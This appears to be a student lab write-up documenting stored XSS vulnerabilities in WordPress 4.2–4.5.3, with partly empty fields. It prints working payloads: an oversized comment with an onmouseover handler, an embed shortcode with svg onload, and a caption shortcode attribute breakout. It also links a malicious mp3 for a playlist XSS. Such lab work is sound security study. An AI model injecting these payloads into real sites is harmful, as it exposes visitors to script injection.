Time spent: 10 hours spent in total
Objective: Find, analyze, recreate, and document five vulnerabilities affecting an old version of WordPress
- (Required) WordPress <= 4.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
- Summary:
- Vulnerability types: XSS
- Tested in version: 4.2.0
- Fixed in version: 4.2.1
- GIF Walkthrough:
- Steps to recreate: Comment on a post with the following -
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px <insert greater than 63kb of any data>'></a>
- Affected source code: https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/
- (Required) Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
- Summary:
- Vulnerability types: XSS
- Tested in version: 4.2.0
- Fixed in version: 4.7.3
- GIF Walkthrough:
- Steps to recreate: Create or update a post with the following code in its body-
[embed src='https://youtube.com/embed/123\x3csvg onload=alert(1)\x3e'][/embed]
- Affected source code: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
- (Required) 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
- Summary:
- Vulnerability types: XSS
- Tested in version: 4.2
- Fixed in version: 4.3.1
- GIF Walkthrough:
- Steps to recreate: Create or update a post with the following code in its body
TEST!!![caption width="1" caption='<a href="' ">]</a><a href="http://onMouseOver='alert(1)'">Click me</a>
- Affected source code: https://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
- (Optional) WordPress 4.5.3 Audio Playlist Cross Site Scripting
- Summary:
- Vulnerability types: XSS
- Tested in version: 4.5.3
- Fixed in version: 4.7.3
- GIF Walkthrough:
- Steps to recreate:
Use the following mp3 https://securify.nl/advisory/SFY20160742/xss.mp3
- upload MP3 file to the Media Library (as Editor or Administrator).
- Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist).
- Affected source code: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
